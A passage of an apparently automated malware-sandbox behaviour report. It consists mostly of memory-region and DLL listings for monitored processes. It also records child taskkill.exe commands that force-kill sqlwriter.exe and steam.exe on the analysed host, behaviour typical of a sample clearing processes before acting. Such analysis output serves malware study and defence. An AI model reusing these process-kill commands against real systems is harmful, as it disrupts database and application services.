0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2647 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2648 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2649 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2650 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2651 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2652 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2653 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2654 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2655 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2656 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2657 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2658 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2659 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2660 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2661 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2662 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2663 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2664 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2665 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2666 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2667 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2668 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2669 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2670 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2671 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2672 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2673 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2674 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2675 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2676 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 214 os_tid = 0xbd8 Thread: id = 230 os_tid = 0x808 Thread: id = 238 os_tid = 0xc2c Thread: id = 243 os_tid = 0xc54 Thread: id = 244 os_tid = 0xc58 Process: id = "32" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0xe89c000" os_pid = "0x3c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM sqlwriter.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2428 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2429 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2430 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2431 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2432 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2433 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2434 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2435 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2436 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2437 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2438 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 2439 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2440 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2441 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2442 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2740 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2741 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2742 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2743 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2744 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2745 start_va = 0xe0000 end_va = 0xe3fff entry_point = 0xe0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2746 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2747 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2748 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 2749 start_va = 0x120000 end_va = 0x120fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 2750 start_va = 0x210000 end_va = 0x2cffff entry_point = 0x210000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2751 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2752 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2753 start_va = 0x550000 end_va = 0x6d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 2754 start_va = 0x6e0000 end_va = 0x860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 2755 start_va = 0x870000 end_va = 0x1c6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 2756 start_va = 0x1d40000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 2757 start_va = 0x1e10000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 2758 start_va = 0x1ef0000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 2759 start_va = 0x1f80000 end_va = 0x1ffffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 2760 start_va = 0x2000000 end_va = 0x22cefff entry_point = 0x2000000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2761 start_va = 0x2310000 end_va = 0x238ffff entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 2762 start_va = 0x23d0000 end_va = 0x244ffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 2763 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2764 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2765 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2766 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 2767 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2768 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2769 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2770 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2771 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2772 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2773 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2774 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2775 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 2776 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2777 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2778 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2779 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2780 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2781 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2782 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2783 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2784 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2785 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2786 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2787 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2788 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2789 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2790 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2791 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2792 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2793 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2794 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2795 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2796 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2797 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2798 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2799 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2800 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2801 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2802 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 223 os_tid = 0x7e0 Thread: id = 241 os_tid = 0xc44 Thread: id = 248 os_tid = 0xc68 Thread: id = 249 os_tid = 0xc6c Thread: id = 250 os_tid = 0xc70 Process: id = "33" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x70fbc000" os_pid = "0x950" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM steam.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2443 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2444 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2445 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2446 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2447 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2448 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2449 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2450 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 2451 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2452 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2453 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 2454 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2455 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2456 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2457 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2818 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2819 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2820 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2821 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2822 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 2823 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 2824 start_va = 0x170000 end_va = 0x173fff entry_point = 0x170000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 2825 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 2826 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2827 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2828 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2829 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 2830 start_va = 0x400000 end_va = 0x587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2831 start_va = 0x590000 end_va = 0x710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2832 start_va = 0x720000 end_va = 0x1b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" 